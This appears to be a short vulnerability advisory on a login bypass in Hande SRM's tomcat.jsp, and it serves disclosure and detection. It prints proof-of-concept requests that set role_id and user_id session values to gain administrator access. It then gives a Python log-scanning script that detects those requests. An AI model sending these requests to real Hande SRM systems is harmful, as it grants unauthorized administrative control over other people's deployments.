Hande SRM tomcat.jsp Login bypass vulnerability
Vulnerability Description
The tomcat.jsp file in Hande SRM has a login bypass vulnerability. An attacker can obtain back-end administrator privileges by sending requests to it.
Vulnerability Impact
Hande SRM
Network surveying and mapping
Vulnerability reproduction
Login page
Verify POC (Tomcat session manipulation)
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
Visit the backend
/main.screen
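
A defender-side check for the request sequence above, as an added example that is not part of the original post: it scans web access logs for /tomcat.jsp requests that set role_id or user_id, and flags clients that afterwards receive a 200 from /main.screen. The combined log format, the sample lines and the IP addresses are constructed assumptions, as is treating the path case-insensitively.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /tomcat.jsp?dataName=role_id&dataValue=1 HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:02 +0000] "GET /tomcat.jsp?dataName=user_id&dataValue=1 HTTP/1.1" 200 12
203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /main.screen HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /main.screen HTTP/1.1" 302 0
198.51.100.20 - - [01/Jan/2024:10:02:00 +0000] "GET /TOMCAT.JSP?datavalue=1&dataName=role_id HTTP/1.1" 404 0
"""

# client IP, method, request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
SESSION_KEYS = {"role_id", "user_id"}  # the two dataName values shown on the page


def scan(log_text):
    """Return {client_ip: {"keys": set, "backend_after": bool}} for flagged clients."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, _method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path.lower()  # assumption: match the path case-insensitively
        if path.endswith("/tomcat.jsp"):
            # parse_qs percent-decodes, so encoded parameter values still match
            params = {k.lower(): v for k, v in parse_qs(url.query).items()}
            keys = {v.lower() for v in params.get("dataname", [])} & SESSION_KEYS
            if keys:
                rec = hits.setdefault(ip, {"keys": set(), "backend_after": False})
                rec["keys"] |= keys
        elif path.endswith("/main.screen") and ip in hits and status == "200":
            # the same client reached the backend after touching session keys
            hits[ip]["backend_after"] = True
    return hits


if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, sorted(rec["keys"]), "backend reached:", rec["backend_after"])
```

Clients with backend_after set are the ones to prioritise for session and account review; the remaining hits are attempts that did not lead to a successful /main.screen response in the scanned window.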
This post is licensed under CC BY 4.0 by the author.